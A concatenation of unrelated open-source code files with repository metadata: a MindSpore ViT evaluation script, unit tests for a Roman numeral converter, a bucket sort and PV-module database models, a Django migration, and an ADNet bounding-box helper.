"code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] } ], "metadata": { "kernelspec": { "display_name": "Python 3", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.7.6" } }, "nbformat": 4, "nbformat_minor": 4 }
18.544627
822
0.450054
106c3edaeb7b07b24af1102f36faeacbaa7d75cf
3,904
py
Python
research/cv/vit_base/eval.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
1
2021-11-18T08:17:44.000Z
2021-11-18T08:17:44.000Z
research/cv/vit_base/eval.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
null
null
null
research/cv/vit_base/eval.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
2
2019-09-01T06:17:04.000Z
2019-10-04T08:39:45.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ Process the test set with the .ckpt model in turn. """ import argparse import mindspore.nn as nn from mindspore import context from mindspore.train.model import Model from mindspore.train.serialization import load_checkpoint, load_param_into_net from mindspore.common import set_seed from mindspore import Tensor from mindspore.common import dtype as mstype from mindspore.nn.loss.loss import LossBase from mindspore.ops import functional as F from mindspore.ops import operations as P from src.config import cifar10_cfg from src.dataset import create_dataset_cifar10 from src.modeling_ms import VisionTransformer import src.net_config as configs set_seed(1) parser = argparse.ArgumentParser(description='vit_base') parser.add_argument('--dataset_name', type=str, default='cifar10', choices=['cifar10'], help='dataset name.') parser.add_argument('--sub_type', type=str, default='ViT-B_16', choices=['ViT-B_16', 'ViT-B_32', 'ViT-L_16', 'ViT-L_32', 'ViT-H_14', 'testing']) parser.add_argument('--checkpoint_path', type=str, default='./ckpt_0', help='Checkpoint file path') parser.add_argument('--id', type=int, default=0, help='Device id') args_opt = parser.parse_args() class CrossEntropySmooth(LossBase): """CrossEntropy""" def __init__(self, sparse=True, reduction='mean', smooth_factor=0., num_classes=1000): super(CrossEntropySmooth, self).__init__() self.onehot = P.OneHot() self.sparse = sparse self.on_value = Tensor(1.0 - smooth_factor, mstype.float32) self.off_value = Tensor(1.0 * smooth_factor / (num_classes - 1), mstype.float32) self.ce = nn.SoftmaxCrossEntropyWithLogits(reduction=reduction) def construct(self, logit, label): if self.sparse: label = self.onehot(label, F.shape(logit)[1], self.on_value, self.off_value) loss_ = self.ce(logit, label) return loss_ if __name__ == '__main__': CONFIGS = {'ViT-B_16': configs.get_b16_config, 'ViT-B_32': configs.get_b32_config, 'ViT-L_16': configs.get_l16_config, 'ViT-L_32': configs.get_l32_config, 'ViT-H_14': configs.get_h14_config, 'R50-ViT-B_16': configs.get_r50_b16_config, 'testing': configs.get_testing} context.set_context(mode=context.GRAPH_MODE, device_target='Ascend', device_id=args_opt.id) if args_opt.dataset_name == "cifar10": cfg = cifar10_cfg net = VisionTransformer(CONFIGS[args_opt.sub_type], num_classes=cfg.num_classes) loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean') opt = nn.Momentum(net.trainable_params(), 0.01, cfg.momentum, weight_decay=cfg.weight_decay) dataset = create_dataset_cifar10(cfg.val_data_path, 1, False) param_dict = load_checkpoint(args_opt.checkpoint_path) print("load checkpoint from [{}].".format(args_opt.checkpoint_path)) load_param_into_net(net, param_dict) net.set_train(False) model = Model(net, loss_fn=loss, optimizer=opt, metrics={'acc'}) else: raise ValueError("dataset is not support.") acc = model.eval(dataset) print(f"model's accuracy is {acc}")
43.377778
100
0.695697
eaaf912f0e46b43bb4864f1b95cd044d6066ff52
1,768
py
Python
python/RomanNumbers/tests/roman_to_arabic_tests.py
enolive/learning
075b714bd7bea6de58a8da16cf142fc6c8535e11
[ "MIT" ]
8
2016-10-18T09:30:12.000Z
2021-12-08T13:28:28.000Z
python/RomanNumbers/tests/roman_to_arabic_tests.py
enolive/learning
075b714bd7bea6de58a8da16cf142fc6c8535e11
[ "MIT" ]
29
2019-12-28T06:09:07.000Z
2022-03-02T03:44:19.000Z
python/RomanNumbers/tests/roman_to_arabic_tests.py
enolive/learning
075b714bd7bea6de58a8da16cf142fc6c8535e11
[ "MIT" ]
4
2018-07-23T22:20:58.000Z
2020-09-19T09:46:41.000Z
import unittest from assertpy import assert_that from nose_parameterized import parameterized from implementation.converter import RomanToArabic from implementation.exceptions import IllegalArgumentError from tests.method_conversion import as_function class RomanToArabicTests(unittest.TestCase): def setUp(self): self.target = RomanToArabic() @parameterized.expand([ ("I", 1), ("II", 2), ("III", 3), ]) def test_that_I_should_be_added_to_result(self, number, expected): # act result = self.target.to_arabic(number) # assert assert_that(result).is_equal_to(expected) def test_that_invalid_characters_fail(self): assert_that(as_function(self.target.to_arabic)) \ .raises(IllegalArgumentError) \ .when_called_with("ThisIsNotRoman") \ .is_equal_to("'ThisIsNotRoman' contains characters that are not a roman digit.") @parameterized.expand([ ("V", 5), ("VI", 6), ]) def test_that_V_should_be_added_to_result(self, number, expected): # act result = self.target.to_arabic(number) # assert assert_that(result).is_equal_to(expected) @parameterized.expand([ ("X", 10), ("XII", 12), ("XV", 15), ]) def test_that_X_should_be_added_to_result(self, number, expected): # act result = self.target.to_arabic(number) # assert assert_that(result).is_equal_to(expected) @parameterized.expand([ ("IX", 9), ]) def test_that_X_should_be_added_to_result(self, number, expected): # act result = self.target.to_arabic(number) # assert assert_that(result).is_equal_to(expected)
28.983607
92
0.646493
dc23758a8a753da129bb0fb049af3ef4d0b61970
3,352
py
Python
tests/test_db.py
schmocker/pv-FHNW
5066e0bc7ce76be5d1a930b50034c746b232a9f8
[ "MIT" ]
1
2019-10-31T13:34:12.000Z
2019-10-31T13:34:12.000Z
tests/test_db.py
schmocker/pv-FHNW
5066e0bc7ce76be5d1a930b50034c746b232a9f8
[ "MIT" ]
1
2019-05-27T13:03:25.000Z
2019-05-27T13:03:25.000Z
tests/test_db.py
schmocker/pv-FHNW
5066e0bc7ce76be5d1a930b50034c746b232a9f8
[ "MIT" ]
null
null
null
import pytest from pvtool.db import PvModule, Measurement, MeasurementValues, FlasherData, ManufacturerData, db @pytest.mark.incremental class TestDBModels(object): def test_pv_module_insert(client, init_db): """ GIVEN a database WHEN database is initialized THEN check if pv_module can be inserted and removed """ test_pv_module = PvModule(model="TEST", manufacturer="TEST", cell_type="TEST", additional_information="TEST", price_CHF="-999", length="-999", width="-999", shunt_resistance="-999", ) db.session.add(test_pv_module) db.session.commit() query_result = db.session.query(PvModule).filter(PvModule.model == test_pv_module.model).first() assert query_result db.session.query(PvModule).filter(PvModule.model == test_pv_module.model).delete() db.session.commit() def test_measurement_insert(client, init_db): """ GIVEN a database WHEN database is initialized THEN check if pv_module can be inserted and removed """ test_measurement = Measurement(date='TEST', measurement_series='TEST', producer='TEST', pv_module_id=1, ) db.session.add(test_measurement) db.session.commit() query_result = db.session.query(Measurement).filter(Measurement.measurement_series == test_measurement.measurement_series).first() assert query_result db.session.query(Measurement).filter(Measurement.measurement_series == test_measurement.measurement_series).delete() db.session.commit() def test_measurement_values_insert(client, init_db): """ GIVEN a database WHEN database is initialized THEN check if measurement_values can be inserted and removed """ test_measurement_values = MeasurementValues(weather='TEST', _U_module=0, _U_shunt=0, _U_T_amb=0, _U_T_pan=0, _U_G_hor=0, _U_G_pan=0, _U_G_ref=0, measurement_id=1, ) db.session.add(test_measurement_values) db.session.commit() query_result = db.session.query(MeasurementValues).\ filter(MeasurementValues.weather == test_measurement_values.weather).first() assert query_result db.session.query(MeasurementValues).filter(MeasurementValues.weather == test_measurement_values.weather).delete() db.session.commit() def insert_multiple_pv_modules(client, init_db): pass
42.43038
138
0.50716
f4a639b713112f9b536c024ee64449eca00ae287
279
py
Python
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
n-hackert/match4healthcare
761248c27b49e568c545c643a72eac9a040649d7
[ "MIT" ]
2
2020-03-28T13:56:39.000Z
2020-03-29T10:16:12.000Z
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
n-hackert/match4healthcare
761248c27b49e568c545c643a72eac9a040649d7
[ "MIT" ]
76
2020-03-27T21:53:04.000Z
2020-03-30T20:27:43.000Z
backend/apps/iamstudent/migrations/0004_merge_20200330_0152.py
n-hackert/match4healthcare
761248c27b49e568c545c643a72eac9a040649d7
[ "MIT" ]
null
null
null
# Generated by Django 3.0.4 on 2020-03-30 01:52 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('iamstudent', '0003_auto_20200330_0020'), ('iamstudent', '0003_auto_20200329_1859'), ] operations = [ ]
18.6
50
0.655914
8734132541ab5ce69ed240741277e35a508b597f
723
py
Python
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
# Beispielprogramm für das Buch "Python Challenge" # # Copyright 2020 by Michael Inden import pytest from ch09_search_and_sort.solutions.ex07_bucket_sort import bucket_sort @pytest.mark.parametrize("values, max, expected", [([10, 50, 22, 7, 42, 111, 50, 7], 150, [7, 7, 10, 22, 42, 50, 50, 111]), ([10, 50, 22, 7, 42, 111, 50, 7], 120, [7, 7, 10, 22, 42, 50, 50, 111]), [[5, 2, 7, 9, 6, 3, 1, 4, 2, 3, 8], 10, [1, 2, 2, 3, 3, 4, 5, 6, 7, 8, 9]]]) def test_bucket_sort(values, max, expected): result = bucket_sort(values, max) assert result == expected
34.428571
71
0.492393
0deda45b4198481e5651eed91a682068abdec048
1,830
py
Python
official/cv/ADNet/src/utils/do_action.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
official/cv/ADNet/src/utils/do_action.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
official/cv/ADNet/src/utils/do_action.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ import numpy as np def do_action(bbox, opts, act, imSize): m = opts['action_move'] # action bbox[0] = bbox[0] + 0.5 * bbox[2] bbox[1] = bbox[1] + 0.5 * bbox[3] deltas = [m['x'] * bbox[2], m['y'] * bbox[3], m['w'] * bbox[2], m['h'] * bbox[3]] deltas = np.maximum(deltas, 1) ar = bbox[2]/bbox[3] if bbox[2] > bbox[3]: deltas[3] = deltas[2] / ar else: deltas[2] = deltas[3] * ar action_delta = np.multiply(np.array(m['deltas'])[act, :], deltas) bbox_next = bbox + action_delta bbox_next[0] = bbox_next[0] - 0.5 * bbox_next[2] bbox_next[1] = bbox_next[1] - 0.5 * bbox_next[3] bbox_next[0] = np.maximum(bbox_next[0], 1) bbox_next[0] = np.minimum(bbox_next[0], imSize[1] - bbox_next[2]) bbox_next[1] = np.maximum(bbox_next[1], 1) bbox_next[1] = np.minimum(bbox_next[1], imSize[0] - bbox_next[3]) bbox_next[2] = np.maximum(5, np.minimum(imSize[1], bbox_next[2])) bbox_next[3] = np.maximum(5, np.minimum(imSize[0], bbox_next[3])) bbox[0] = bbox[0] - 0.5 * bbox[2] bbox[1] = bbox[1] - 0.5 * bbox[3] return bbox_next
33.888889
78
0.598361